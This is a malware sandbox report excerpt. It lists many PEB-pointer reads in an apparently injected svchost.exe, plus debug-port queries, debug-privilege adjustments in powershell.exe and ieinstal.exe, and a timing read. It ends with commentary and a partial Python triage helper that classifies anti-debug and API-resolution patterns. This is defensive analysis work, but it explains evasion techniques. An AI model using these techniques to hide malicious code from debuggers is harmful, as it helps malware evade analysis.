Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03443A1C mov eax, dword ptr fs:[00000030h] 26_2_03443A1C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034EAA16 mov eax, dword ptr fs:[00000030h] 26_2_034EAA16
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034EAA16 mov eax, dword ptr fs:[00000030h] 26_2_034EAA16
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03464A2C mov eax, dword ptr fs:[00000030h] 26_2_03464A2C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03464A2C mov eax, dword ptr fs:[00000030h] 26_2_03464A2C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03452ACB mov eax, dword ptr fs:[00000030h] 26_2_03452ACB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03452AE4 mov eax, dword ptr fs:[00000030h] 26_2_03452AE4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0345D294 mov eax, dword ptr fs:[00000030h] 26_2_0345D294
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0345D294 mov eax, dword ptr fs:[00000030h] 26_2_0345D294
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034252A5 mov eax, dword ptr fs:[00000030h] 26_2_034252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034252A5 mov eax, dword ptr fs:[00000030h] 26_2_034252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034252A5 mov eax, dword ptr fs:[00000030h] 26_2_034252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034252A5 mov eax, dword ptr fs:[00000030h] 26_2_034252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034252A5 mov eax, dword ptr fs:[00000030h] 26_2_034252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0343AAB0 mov eax, dword ptr fs:[00000030h] 26_2_0343AAB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0343AAB0 mov eax, dword ptr fs:[00000030h] 26_2_0343AAB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0345FAB0 mov eax, dword ptr fs:[00000030h] 26_2_0345FAB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0344B944 mov eax, dword ptr fs:[00000030h] 26_2_0344B944
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0344B944 mov eax, dword ptr fs:[00000030h] 26_2_0344B944
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0342C962 mov eax, dword ptr fs:[00000030h] 26_2_0342C962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0342B171 mov eax, dword ptr fs:[00000030h] 26_2_0342B171
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0342B171 mov eax, dword ptr fs:[00000030h] 26_2_0342B171
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03429100 mov eax, dword ptr fs:[00000030h] 26_2_03429100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03429100 mov eax, dword ptr fs:[00000030h] 26_2_03429100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03429100 mov eax, dword ptr fs:[00000030h] 26_2_03429100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03444120 mov eax, dword ptr fs:[00000030h] 26_2_03444120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03444120 mov eax, dword ptr fs:[00000030h] 26_2_03444120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03444120 mov eax, dword ptr fs:[00000030h] 26_2_03444120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03444120 mov eax, dword ptr fs:[00000030h] 26_2_03444120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03444120 mov ecx, dword ptr fs:[00000030h] 26_2_03444120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0345513A mov eax, dword ptr fs:[00000030h] 26_2_0345513A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0345513A mov eax, dword ptr fs:[00000030h] 26_2_0345513A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034B41E8 mov eax, dword ptr fs:[00000030h] 26_2_034B41E8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0342B1E1 mov eax, dword ptr fs:[00000030h] 26_2_0342B1E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0342B1E1 mov eax, dword ptr fs:[00000030h] 26_2_0342B1E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0342B1E1 mov eax, dword ptr fs:[00000030h] 26_2_0342B1E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0345A185 mov eax, dword ptr fs:[00000030h] 26_2_0345A185
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0344C182 mov eax, dword ptr fs:[00000030h] 26_2_0344C182
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03452990 mov eax, dword ptr fs:[00000030h] 26_2_03452990
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034561A0 mov eax, dword ptr fs:[00000030h] 26_2_034561A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034561A0 mov eax, dword ptr fs:[00000030h] 26_2_034561A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034A69A6 mov eax, dword ptr fs:[00000030h] 26_2_034A69A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034A51BE mov eax, dword ptr fs:[00000030h] 26_2_034A51BE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034A51BE mov eax, dword ptr fs:[00000030h] 26_2_034A51BE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034A51BE mov eax, dword ptr fs:[00000030h] 26_2_034A51BE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034A51BE mov eax, dword ptr fs:[00000030h] 26_2_034A51BE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03440050 mov eax, dword ptr fs:[00000030h] 26_2_03440050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03440050 mov eax, dword ptr fs:[00000030h] 26_2_03440050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034F1074 mov eax, dword ptr fs:[00000030h] 26_2_034F1074
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034E2073 mov eax, dword ptr fs:[00000030h] 26_2_034E2073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034F4015 mov eax, dword ptr fs:[00000030h] 26_2_034F4015
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034F4015 mov eax, dword ptr fs:[00000030h] 26_2_034F4015
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034A7016 mov eax, dword ptr fs:[00000030h] 26_2_034A7016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034A7016 mov eax, dword ptr fs:[00000030h] 26_2_034A7016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034A7016 mov eax, dword ptr fs:[00000030h] 26_2_034A7016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0345002D mov eax, dword ptr fs:[00000030h] 26_2_0345002D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0345002D mov eax, dword ptr fs:[00000030h] 26_2_0345002D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0345002D mov eax, dword ptr fs:[00000030h] 26_2_0345002D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0345002D mov eax, dword ptr fs:[00000030h] 26_2_0345002D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0345002D mov eax, dword ptr fs:[00000030h] 26_2_0345002D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0343B02A mov eax, dword ptr fs:[00000030h] 26_2_0343B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0343B02A mov eax, dword ptr fs:[00000030h] 26_2_0343B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0343B02A mov eax, dword ptr fs:[00000030h] 26_2_0343B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0343B02A mov eax, dword ptr fs:[00000030h] 26_2_0343B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034BB8D0 mov eax, dword ptr fs:[00000030h] 26_2_034BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034BB8D0 mov ecx, dword ptr fs:[00000030h] 26_2_034BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034BB8D0 mov eax, dword ptr fs:[00000030h] 26_2_034BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034BB8D0 mov eax, dword ptr fs:[00000030h] 26_2_034BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034BB8D0 mov eax, dword ptr fs:[00000030h] 26_2_034BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034BB8D0 mov eax, dword ptr fs:[00000030h] 26_2_034BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034258EC mov eax, dword ptr fs:[00000030h] 26_2_034258EC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03429080 mov eax, dword ptr fs:[00000030h] 26_2_03429080
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034A3884 mov eax, dword ptr fs:[00000030h] 26_2_034A3884
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034A3884 mov eax, dword ptr fs:[00000030h] 26_2_034A3884
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034520A0 mov eax, dword ptr fs:[00000030h] 26_2_034520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034520A0 mov eax, dword ptr fs:[00000030h] 26_2_034520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034520A0 mov eax, dword ptr fs:[00000030h] 26_2_034520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034520A0 mov eax, dword ptr fs:[00000030h] 26_2_034520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034520A0 mov eax, dword ptr fs:[00000030h] 26_2_034520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034520A0 mov eax, dword ptr fs:[00000030h] 26_2_034520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034690AF mov eax, dword ptr fs:[00000030h] 26_2_034690AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0345F0BF mov ecx, dword ptr fs:[00000030h] 26_2_0345F0BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0345F0BF mov eax, dword ptr fs:[00000030h] 26_2_0345F0BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0345F0BF mov eax, dword ptr fs:[00000030h] 26_2_0345F0BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0343EF40 mov eax, dword ptr fs:[00000030h] 26_2_0343EF40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0343FF60 mov eax, dword ptr fs:[00000030h] 26_2_0343FF60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034F8F6A mov eax, dword ptr fs:[00000030h] 26_2_034F8F6A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034F070D mov eax, dword ptr fs:[00000030h] 26_2_034F070D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034F070D mov eax, dword ptr fs:[00000030h] 26_2_034F070D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0345A70E mov eax, dword ptr fs:[00000030h] 26_2_0345A70E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0345A70E mov eax, dword ptr fs:[00000030h] 26_2_0345A70E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0344F716 mov eax, dword ptr fs:[00000030h] 26_2_0344F716
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034BFF10 mov eax, dword ptr fs:[00000030h] 26_2_034BFF10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034BFF10 mov eax, dword ptr fs:[00000030h] 26_2_034BFF10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03424F2E mov eax, dword ptr fs:[00000030h] 26_2_03424F2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03424F2E mov eax, dword ptr fs:[00000030h] 26_2_03424F2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0345E730 mov eax, dword ptr fs:[00000030h] 26_2_0345E730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034637F5 mov eax, dword ptr fs:[00000030h] 26_2_034637F5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03438794 mov eax, dword ptr fs:[00000030h] 26_2_03438794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034A7794 mov eax, dword ptr fs:[00000030h] 26_2_034A7794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034A7794 mov eax, dword ptr fs:[00000030h] 26_2_034A7794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034A7794 mov eax, dword ptr fs:[00000030h] 26_2_034A7794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03437E41 mov eax, dword ptr fs:[00000030h] 26_2_03437E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03437E41 mov eax, dword ptr fs:[00000030h] 26_2_03437E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03437E41 mov eax, dword ptr fs:[00000030h] 26_2_03437E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03437E41 mov eax, dword ptr fs:[00000030h] 26_2_03437E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03437E41 mov eax, dword ptr fs:[00000030h] 26_2_03437E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03437E41 mov eax, dword ptr fs:[00000030h] 26_2_03437E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034EAE44 mov eax, dword ptr fs:[00000030h] 26_2_034EAE44
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034EAE44 mov eax, dword ptr fs:[00000030h] 26_2_034EAE44
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0343766D mov eax, dword ptr fs:[00000030h] 26_2_0343766D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0344AE73 mov eax, dword ptr fs:[00000030h] 26_2_0344AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0344AE73 mov eax, dword ptr fs:[00000030h] 26_2_0344AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0344AE73 mov eax, dword ptr fs:[00000030h] 26_2_0344AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0344AE73 mov eax, dword ptr fs:[00000030h] 26_2_0344AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0344AE73 mov eax, dword ptr fs:[00000030h] 26_2_0344AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0342C600 mov eax, dword ptr fs:[00000030h] 26_2_0342C600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0342C600 mov eax, dword ptr fs:[00000030h] 26_2_0342C600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0342C600 mov eax, dword ptr fs:[00000030h] 26_2_0342C600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03458E00 mov eax, dword ptr fs:[00000030h] 26_2_03458E00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034E1608 mov eax, dword ptr fs:[00000030h] 26_2_034E1608
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0345A61C mov eax, dword ptr fs:[00000030h] 26_2_0345A61C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0345A61C mov eax, dword ptr fs:[00000030h] 26_2_0345A61C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0342E620 mov eax, dword ptr fs:[00000030h] 26_2_0342E620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034DFE3F mov eax, dword ptr fs:[00000030h] 26_2_034DFE3F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03468EC7 mov eax, dword ptr fs:[00000030h] 26_2_03468EC7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034536CC mov eax, dword ptr fs:[00000030h] 26_2_034536CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034DFEC0 mov eax, dword ptr fs:[00000030h] 26_2_034DFEC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034F8ED6 mov eax, dword ptr fs:[00000030h] 26_2_034F8ED6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034376E2 mov eax, dword ptr fs:[00000030h] 26_2_034376E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034516E0 mov ecx, dword ptr fs:[00000030h] 26_2_034516E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034BFE87 mov eax, dword ptr fs:[00000030h] 26_2_034BFE87
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034F0EA5 mov eax, dword ptr fs:[00000030h] 26_2_034F0EA5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034F0EA5 mov eax, dword ptr fs:[00000030h] 26_2_034F0EA5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034F0EA5 mov eax, dword ptr fs:[00000030h] 26_2_034F0EA5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034A46A7 mov eax, dword ptr fs:[00000030h] 26_2_034A46A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03463D43 mov eax, dword ptr fs:[00000030h] 26_2_03463D43
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034A3540 mov eax, dword ptr fs:[00000030h] 26_2_034A3540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03447D50 mov eax, dword ptr fs:[00000030h] 26_2_03447D50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0344C577 mov eax, dword ptr fs:[00000030h] 26_2_0344C577
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0344C577 mov eax, dword ptr fs:[00000030h] 26_2_0344C577
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0342AD30 mov eax, dword ptr fs:[00000030h] 26_2_0342AD30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03433D34 mov eax, dword ptr fs:[00000030h] 26_2_03433D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03433D34 mov eax, dword ptr fs:[00000030h] 26_2_03433D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03433D34 mov eax, dword ptr fs:[00000030h] 26_2_03433D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03433D34 mov eax, dword ptr fs:[00000030h] 26_2_03433D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03433D34 mov eax, dword ptr fs:[00000030h] 26_2_03433D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03433D34 mov eax, dword ptr fs:[00000030h] 26_2_03433D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03433D34 mov eax, dword ptr fs:[00000030h] 26_2_03433D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03433D34 mov eax, dword ptr fs:[00000030h] 26_2_03433D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03433D34 mov eax, dword ptr fs:[00000030h] 26_2_03433D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03433D34 mov eax, dword ptr fs:[00000030h] 26_2_03433D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03433D34 mov eax, dword ptr fs:[00000030h] 26_2_03433D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03433D34 mov eax, dword ptr fs:[00000030h] 26_2_03433D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03433D34 mov eax, dword ptr fs:[00000030h] 26_2_03433D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034EE539 mov eax, dword ptr fs:[00000030h] 26_2_034EE539
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034F8D34 mov eax, dword ptr fs:[00000030h] 26_2_034F8D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034AA537 mov eax, dword ptr fs:[00000030h] 26_2_034AA537
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03454D3B mov eax, dword ptr fs:[00000030h] 26_2_03454D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03454D3B mov eax, dword ptr fs:[00000030h] 26_2_03454D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03454D3B mov eax, dword ptr fs:[00000030h] 26_2_03454D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034A6DC9 mov eax, dword ptr fs:[00000030h] 26_2_034A6DC9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034A6DC9 mov eax, dword ptr fs:[00000030h] 26_2_034A6DC9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034A6DC9 mov eax, dword ptr fs:[00000030h] 26_2_034A6DC9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034A6DC9 mov ecx, dword ptr fs:[00000030h] 26_2_034A6DC9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034A6DC9 mov eax, dword ptr fs:[00000030h] 26_2_034A6DC9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034A6DC9 mov eax, dword ptr fs:[00000030h] 26_2_034A6DC9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0343D5E0 mov eax, dword ptr fs:[00000030h] 26_2_0343D5E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0343D5E0 mov eax, dword ptr fs:[00000030h] 26_2_0343D5E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034EFDE2 mov eax, dword ptr fs:[00000030h] 26_2_034EFDE2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034EFDE2 mov eax, dword ptr fs:[00000030h] 26_2_034EFDE2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034EFDE2 mov eax, dword ptr fs:[00000030h] 26_2_034EFDE2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034EFDE2 mov eax, dword ptr fs:[00000030h] 26_2_034EFDE2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034D8DF1 mov eax, dword ptr fs:[00000030h] 26_2_034D8DF1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03452581 mov eax, dword ptr fs:[00000030h] 26_2_03452581
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03452581 mov eax, dword ptr fs:[00000030h] 26_2_03452581
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03452581 mov eax, dword ptr fs:[00000030h] 26_2_03452581
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03452581 mov eax, dword ptr fs:[00000030h] 26_2_03452581
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03422D8A mov eax, dword ptr fs:[00000030h] 26_2_03422D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03422D8A mov eax, dword ptr fs:[00000030h] 26_2_03422D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03422D8A mov eax, dword ptr fs:[00000030h] 26_2_03422D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03422D8A mov eax, dword ptr fs:[00000030h] 26_2_03422D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03422D8A mov eax, dword ptr fs:[00000030h] 26_2_03422D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0345FD9B mov eax, dword ptr fs:[00000030h] 26_2_0345FD9B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0345FD9B mov eax, dword ptr fs:[00000030h] 26_2_0345FD9B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034F05AC mov eax, dword ptr fs:[00000030h] 26_2_034F05AC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034F05AC mov eax, dword ptr fs:[00000030h] 26_2_034F05AC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034535A1 mov eax, dword ptr fs:[00000030h] 26_2_034535A1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03451DB5 mov eax, dword ptr fs:[00000030h] 26_2_03451DB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03451DB5 mov eax, dword ptr fs:[00000030h] 26_2_03451DB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03451DB5 mov eax, dword ptr fs:[00000030h] 26_2_03451DB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0345A44B mov eax, dword ptr fs:[00000030h] 26_2_0345A44B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034BC450 mov eax, dword ptr fs:[00000030h] 26_2_034BC450
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034BC450 mov eax, dword ptr fs:[00000030h] 26_2_034BC450
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0344746D mov eax, dword ptr fs:[00000030h] 26_2_0344746D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034A6C0A mov eax, dword ptr fs:[00000030h] 26_2_034A6C0A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034A6C0A mov eax, dword ptr fs:[00000030h] 26_2_034A6C0A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034A6C0A mov eax, dword ptr fs:[00000030h] 26_2_034A6C0A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034A6C0A mov eax, dword ptr fs:[00000030h] 26_2_034A6C0A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034F740D mov eax, dword ptr fs:[00000030h] 26_2_034F740D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034F740D mov eax, dword ptr fs:[00000030h] 26_2_034F740D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC86A60 rdtscp 23_2_1EC86A60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\svchost.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC996E0 NtFreeVirtualMemory,LdrInitializeThunk, 23_2_1EC996E0
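
The block of `mov eax/ecx, dword ptr fs:[00000030h]` hits above is the sandbox flagging reads of the PEB pointer from the 32-bit TEB inside a code region of the SysWOW64 svchost.exe, and the `rdtscp` in ieinstal.exe is a timestamp read of the kind used for timing checks. A PEB read on its own is weak evidence of anti-debugging: position-independent shellcode reads the same pointer to walk PEB->Ldr and resolve kernel32 exports, so the raw hit count overstates the number of debugger checks. The Python below is an added triage helper, not part of this report or of the sandbox; it finds those encodings in a 32-bit code dump and classifies each PEB read by the instruction that consumes the pointer. The byte stub and the 0x03420000 load address are constructed for the example and are not taken from the sample.

```python
"""Classify fs:[30h] PEB reads and rdtsc(p) timing reads in a 32-bit code dump."""
import re

# Encodings of the instructions the sandbox flagged. In a 32-bit (SysWOW64)
# process fs:[30h] is the TEB slot holding the PEB pointer, so each hit is a
# PEB read; what the code does next decides whether it is an anti-debug check.
SIGS = {
    "mov eax, fs:[30h]": b"\x64\xa1\x30\x00\x00\x00",
    "mov ecx, fs:[30h]": b"\x64\x8b\x0d\x30\x00\x00\x00",
    "rdtsc": b"\x0f\x31",
    "rdtscp": b"\x0f\x01\xf9",
}

# Instruction that consumes the PEB pointer -> (PEB field, category), using the
# 32-bit PEB layout: +0x02 BeingDebugged, +0x0C Ldr, +0x18 ProcessHeap,
# +0x68 NtGlobalFlag. ProcessHeap Flags/ForceFlags is a further anti-debug
# trick, but the heap pointer is also read for ordinary allocation, so it gets
# its own bucket.
PEB_USES = {
    b"\x0f\xb6\x40\x02": ("BeingDebugged", "anti_debug"),  # movzx eax, byte ptr [eax+2]
    b"\x0f\xb6\x41\x02": ("BeingDebugged", "anti_debug"),  # movzx eax, byte ptr [ecx+2]
    b"\x8b\x40\x68": ("NtGlobalFlag", "anti_debug"),       # mov eax, [eax+68h]
    b"\x8b\x41\x68": ("NtGlobalFlag", "anti_debug"),       # mov eax, [ecx+68h]
    b"\x8b\x40\x0c": ("Ldr", "api_resolution"),            # mov eax, [eax+0Ch]
    b"\x8b\x49\x0c": ("Ldr", "api_resolution"),            # mov ecx, [ecx+0Ch]
    b"\x8b\x40\x18": ("ProcessHeap", "heap_flags"),        # mov eax, [eax+18h]
}


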